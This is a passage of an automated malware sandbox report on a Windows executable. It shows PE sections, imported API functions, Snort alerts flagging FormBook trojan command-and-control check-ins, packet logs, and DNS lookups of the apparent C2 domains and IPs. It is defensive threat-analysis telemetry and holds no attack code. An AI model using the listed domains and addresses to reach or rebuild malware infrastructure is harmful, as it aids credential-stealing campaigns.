                                                                        .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x380000x5670x600False0.432942708333data3.95240646825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_DIALOG0x381000x100dataEnglishUnited States
                                                                        RT_DIALOG0x382000x11cdataEnglishUnited States
                                                                        RT_DIALOG0x3831c0x60dataEnglishUnited States
                                                                        RT_MANIFEST0x3837c0x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                        USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                        SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                        ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        04/08/21-10:48:49.778557TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.4184.168.131.241
                                                                        04/08/21-10:48:49.778557TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.4184.168.131.241
                                                                        04/08/21-10:48:49.778557TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.4184.168.131.241
                                                                        04/08/21-10:48:55.129556TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.413.248.216.40
                                                                        04/08/21-10:48:55.129556TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.413.248.216.40
                                                                        04/08/21-10:48:55.129556TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.413.248.216.40
                                                                        04/08/21-10:48:55.307358TCP1201ATTACK-RESPONSES 403 Forbidden804973713.248.216.40192.168.2.4
                                                                        04/08/21-10:49:16.320554TCP1201ATTACK-RESPONSES 403 Forbidden804975534.102.136.180192.168.2.4
                                                                        04/08/21-10:49:21.406011TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.464.190.62.111
                                                                        04/08/21-10:49:21.406011TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.464.190.62.111
                                                                        04/08/21-10:49:21.406011TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975880192.168.2.464.190.62.111
                                                                        04/08/21-10:49:32.039463TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.491.195.240.94
                                                                        04/08/21-10:49:32.039463TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.491.195.240.94
                                                                        04/08/21-10:49:32.039463TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976580192.168.2.491.195.240.94
                                                                        04/08/21-10:49:43.196349TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.434.102.136.180
                                                                        04/08/21-10:49:43.196349TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.434.102.136.180
                                                                        04/08/21-10:49:43.196349TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.434.102.136.180
                                                                        04/08/21-10:49:43.311575TCP1201ATTACK-RESPONSES 403 Forbidden804976834.102.136.180192.168.2.4

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 8, 2021 10:48:49.599870920 CEST4973480192.168.2.4184.168.131.241
                                                                        Apr 8, 2021 10:48:49.778085947 CEST8049734184.168.131.241192.168.2.4
                                                                        Apr 8, 2021 10:48:49.778321981 CEST4973480192.168.2.4184.168.131.241
                                                                        Apr 8, 2021 10:48:49.778557062 CEST4973480192.168.2.4184.168.131.241
                                                                        Apr 8, 2021 10:48:49.956588984 CEST8049734184.168.131.241192.168.2.4
                                                                        Apr 8, 2021 10:48:49.956664085 CEST8049734184.168.131.241192.168.2.4
                                                                        Apr 8, 2021 10:48:49.956691980 CEST8049734184.168.131.241192.168.2.4
                                                                        Apr 8, 2021 10:48:49.957007885 CEST4973480192.168.2.4184.168.131.241
                                                                        Apr 8, 2021 10:48:49.957043886 CEST4973480192.168.2.4184.168.131.241
                                                                        Apr 8, 2021 10:48:50.135140896 CEST8049734184.168.131.241192.168.2.4
                                                                        Apr 8, 2021 10:48:55.114048958 CEST4973780192.168.2.413.248.216.40
                                                                        Apr 8, 2021 10:48:55.126236916 CEST804973713.248.216.40192.168.2.4
                                                                        Apr 8, 2021 10:48:55.129455090 CEST4973780192.168.2.413.248.216.40
                                                                        Apr 8, 2021 10:48:55.129555941 CEST4973780192.168.2.413.248.216.40
                                                                        Apr 8, 2021 10:48:55.141519070 CEST804973713.248.216.40192.168.2.4
                                                                        Apr 8, 2021 10:48:55.307358027 CEST804973713.248.216.40192.168.2.4
                                                                        Apr 8, 2021 10:48:55.307454109 CEST804973713.248.216.40192.168.2.4
                                                                        Apr 8, 2021 10:48:55.307897091 CEST4973780192.168.2.413.248.216.40
                                                                        Apr 8, 2021 10:48:55.319649935 CEST804973713.248.216.40192.168.2.4
                                                                        Apr 8, 2021 10:49:05.623529911 CEST4974280192.168.2.4135.181.58.27
                                                                        Apr 8, 2021 10:49:05.674776077 CEST8049742135.181.58.27192.168.2.4
                                                                        Apr 8, 2021 10:49:05.674967051 CEST4974280192.168.2.4135.181.58.27
                                                                        Apr 8, 2021 10:49:05.675004959 CEST4974280192.168.2.4135.181.58.27
                                                                        Apr 8, 2021 10:49:05.732067108 CEST8049742135.181.58.27192.168.2.4
                                                                        Apr 8, 2021 10:49:05.732119083 CEST8049742135.181.58.27192.168.2.4
                                                                        Apr 8, 2021 10:49:05.732193947 CEST8049742135.181.58.27192.168.2.4
                                                                        Apr 8, 2021 10:49:05.732331991 CEST4974280192.168.2.4135.181.58.27
                                                                        Apr 8, 2021 10:49:05.732392073 CEST4974280192.168.2.4135.181.58.27
                                                                        Apr 8, 2021 10:49:05.780396938 CEST8049742135.181.58.27192.168.2.4
                                                                        Apr 8, 2021 10:49:10.809366941 CEST4974380192.168.2.464.32.22.102
                                                                        Apr 8, 2021 10:49:10.974342108 CEST804974364.32.22.102192.168.2.4
                                                                        Apr 8, 2021 10:49:10.974803925 CEST4974380192.168.2.464.32.22.102
                                                                        Apr 8, 2021 10:49:10.974932909 CEST4974380192.168.2.464.32.22.102
                                                                        Apr 8, 2021 10:49:11.139417887 CEST804974364.32.22.102192.168.2.4
                                                                        Apr 8, 2021 10:49:11.139461040 CEST804974364.32.22.102192.168.2.4
                                                                        Apr 8, 2021 10:49:11.139472008 CEST804974364.32.22.102192.168.2.4
                                                                        Apr 8, 2021 10:49:11.139687061 CEST4974380192.168.2.464.32.22.102
                                                                        Apr 8, 2021 10:49:11.139733076 CEST4974380192.168.2.464.32.22.102
                                                                        Apr 8, 2021 10:49:11.303935051 CEST804974364.32.22.102192.168.2.4
                                                                        Apr 8, 2021 10:49:16.194564104 CEST4975580192.168.2.434.102.136.180
                                                                        Apr 8, 2021 10:49:16.206888914 CEST804975534.102.136.180192.168.2.4
                                                                        Apr 8, 2021 10:49:16.206983089 CEST4975580192.168.2.434.102.136.180
                                                                        Apr 8, 2021 10:49:16.207128048 CEST4975580192.168.2.434.102.136.180
                                                                        Apr 8, 2021 10:49:16.219321012 CEST804975534.102.136.180192.168.2.4
                                                                        Apr 8, 2021 10:49:16.320554018 CEST804975534.102.136.180192.168.2.4
                                                                        Apr 8, 2021 10:49:16.320580006 CEST804975534.102.136.180192.168.2.4
                                                                        Apr 8, 2021 10:49:16.320749998 CEST4975580192.168.2.434.102.136.180
                                                                        Apr 8, 2021 10:49:16.320787907 CEST4975580192.168.2.434.102.136.180
                                                                        Apr 8, 2021 10:49:16.333220959 CEST804975534.102.136.180192.168.2.4
                                                                        Apr 8, 2021 10:49:21.382102966 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.404936075 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.405776978 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.406011105 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.429078102 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577060938 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577083111 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577095985 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577105999 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577236891 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577260017 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577271938 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577286005 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577311993 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577328920 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577351093 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577356100 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577362061 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577368975 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577405930 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577411890 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577414989 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577418089 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577435970 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577450037 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577464104 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577490091 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577559948 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577570915 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577574015 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577575922 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577599049 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577616930 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.577785969 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.577841043 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.600424051 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.600462914 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.600488901 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.600512028 CEST804975864.190.62.111192.168.2.4
                                                                        Apr 8, 2021 10:49:21.600524902 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:21.600547075 CEST4975880192.168.2.464.190.62.111
                                                                        Apr 8, 2021 10:49:26.644073009 CEST4975980192.168.2.4185.230.60.177
                                                                        Apr 8, 2021 10:49:26.759862900 CEST8049759185.230.60.177192.168.2.4
                                                                        Apr 8, 2021 10:49:26.760004044 CEST4975980192.168.2.4185.230.60.177
                                                                        Apr 8, 2021 10:49:26.760282993 CEST4975980192.168.2.4185.230.60.177
                                                                        Apr 8, 2021 10:49:26.876003981 CEST8049759185.230.60.177192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951628923 CEST8049759185.230.60.177192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951685905 CEST8049759185.230.60.177192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951740026 CEST8049759185.230.60.177192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951775074 CEST8049759185.230.60.177192.168.2.4
                                                                        Apr 8, 2021 10:49:26.951783895 CEST4975980192.168.2.4185.230.60.177

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 8, 2021 10:47:44.957789898 CEST53545318.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:47:47.723849058 CEST4971453192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:47:47.743160009 CEST53497148.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:13.182699919 CEST5802853192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:13.195238113 CEST53580288.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:13.812042952 CEST5309753192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:13.825560093 CEST53530978.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:18.545295954 CEST4925753192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:18.558226109 CEST53492578.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:23.553997993 CEST6238953192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:23.566504002 CEST53623898.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:31.570205927 CEST4991053192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:31.582928896 CEST53499108.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:39.804501057 CEST5585453192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:39.817284107 CEST53558548.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:42.646214962 CEST6454953192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:42.659003019 CEST53645498.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:43.660104036 CEST6315353192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:43.673937082 CEST53631538.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:49.567555904 CEST5299153192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:49.587600946 CEST53529918.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:54.229969978 CEST5370053192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:54.243041039 CEST53537008.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:48:54.964912891 CEST5172653192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:48:54.987523079 CEST53517268.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:00.324605942 CEST5679453192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:00.455733061 CEST5653453192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:00.474431038 CEST53565348.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:00.554574013 CEST53567948.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:05.580651999 CEST5662753192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:05.622571945 CEST53566278.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:10.748123884 CEST5662153192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:10.807682037 CEST53566218.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:11.264971972 CEST6311653192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:11.381993055 CEST53631168.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:11.811759949 CEST6407853192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:11.961067915 CEST53640788.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:12.417824030 CEST6480153192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:12.430886984 CEST53648018.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:12.499572992 CEST6172153192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:12.526094913 CEST53617218.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:12.762901068 CEST5125553192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:12.776384115 CEST53512558.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:13.182151079 CEST6152253192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:13.195466995 CEST53615228.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:13.611567974 CEST5233753192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:13.725305080 CEST53523378.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:14.062154055 CEST5504653192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:14.074790001 CEST53550468.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:14.625284910 CEST4961253192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:14.638209105 CEST53496128.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:15.868083000 CEST4928553192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:15.881073952 CEST53492858.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:16.044861078 CEST5060153192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:16.057391882 CEST53506018.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:16.159521103 CEST6087553192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:16.193547010 CEST53608758.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:16.204226971 CEST5644853192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:16.217571974 CEST53564488.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:17.639309883 CEST5917253192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:17.652179956 CEST53591728.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:21.347358942 CEST6242053192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:21.378154039 CEST53624208.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:26.593446970 CEST6057953192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:26.641731024 CEST53605798.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:27.238945961 CEST5018353192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:27.251588106 CEST53501838.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:27.890868902 CEST6153153192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:27.902767897 CEST53615318.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:29.829518080 CEST4922853192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:29.842056990 CEST53492288.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:31.492182016 CEST5979453192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:31.504622936 CEST53597948.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:31.937010050 CEST5591653192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:31.951236010 CEST53559168.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:31.968797922 CEST5275253192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:32.013699055 CEST53527528.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:32.468652964 CEST6054253192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:32.483134031 CEST53605428.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:37.136812925 CEST6068953192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:37.457993031 CEST53606898.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:43.143384933 CEST6420653192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:43.182207108 CEST53642068.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:46.088186979 CEST5090453192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:46.100574017 CEST53509048.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:48.334547997 CEST5752553192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:48.366859913 CEST53575258.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:49.858028889 CEST5381453192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:49.870970964 CEST53538148.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:53.462363005 CEST5341853192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:53.884182930 CEST53534188.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:58.071777105 CEST6283353192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:58.084578037 CEST53628338.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:49:59.069574118 CEST5926053192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:49:59.359829903 CEST53592608.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:50:00.540715933 CEST4994453192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:50:00.553673983 CEST53499448.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:50:01.262131929 CEST6330053192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:50:01.274245977 CEST53633008.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:50:02.204255104 CEST6144953192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:50:02.217500925 CEST53614498.8.8.8192.168.2.4
                                                                        Apr 8, 2021 10:50:05.582552910 CEST5127553192.168.2.48.8.8.8
                                                                        Apr 8, 2021 10:50:05.634023905 CEST53512758.8.8.8192.168.2.4

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Apr 8, 2021 10:48:49.567555904 CEST192.168.2.48.8.8.80x9152Standard query (0)www.biehnrecords.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:48:54.964912891 CEST192.168.2.48.8.8.80x245Standard query (0)www.bedpee.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:00.324605942 CEST192.168.2.48.8.8.80xf223Standard query (0)www.stone-master.infoA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:05.580651999 CEST192.168.2.48.8.8.80x782fStandard query (0)www.pmrack.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.748123884 CEST192.168.2.48.8.8.80x5a5cStandard query (0)www.serversexposed.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:16.159521103 CEST192.168.2.48.8.8.80xb5c9Standard query (0)www.heliumhubs.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:21.347358942 CEST192.168.2.48.8.8.80x793fStandard query (0)www.420vaca.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:26.593446970 CEST192.168.2.48.8.8.80x7985Standard query (0)www.shujahumayun.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:31.968797922 CEST192.168.2.48.8.8.80x2066Standard query (0)www.dottproject.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:37.136812925 CEST192.168.2.48.8.8.80xd1ccStandard query (0)www.qcmax.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:43.143384933 CEST192.168.2.48.8.8.80xb0a5Standard query (0)www.playfulpainters.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:48.334547997 CEST192.168.2.48.8.8.80x3e76Standard query (0)www.autobrehna.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:53.462363005 CEST192.168.2.48.8.8.80x150fStandard query (0)www.nagoyadoori.xyzA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:59.069574118 CEST192.168.2.48.8.8.80xbcdaStandard query (0)www.appgusher.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:50:05.582552910 CEST192.168.2.48.8.8.80x6686Standard query (0)www.thesixteenthround.netA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Apr 8, 2021 10:48:49.587600946 CEST8.8.8.8192.168.2.40x9152No error (0)www.biehnrecords.combiehnrecords.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:48:49.587600946 CEST8.8.8.8192.168.2.40x9152No error (0)biehnrecords.com184.168.131.241A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:48:54.987523079 CEST8.8.8.8192.168.2.40x245No error (0)www.bedpee.com13.248.216.40A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:48:54.987523079 CEST8.8.8.8192.168.2.40x245No error (0)www.bedpee.com76.223.65.111A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:00.554574013 CEST8.8.8.8192.168.2.40xf223Name error (3)www.stone-master.infononenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:05.622571945 CEST8.8.8.8192.168.2.40x782fNo error (0)www.pmrack.compmrack.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:49:05.622571945 CEST8.8.8.8192.168.2.40x782fNo error (0)pmrack.com135.181.58.27A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)www.serversexposed.comparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com188.164.131.200A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
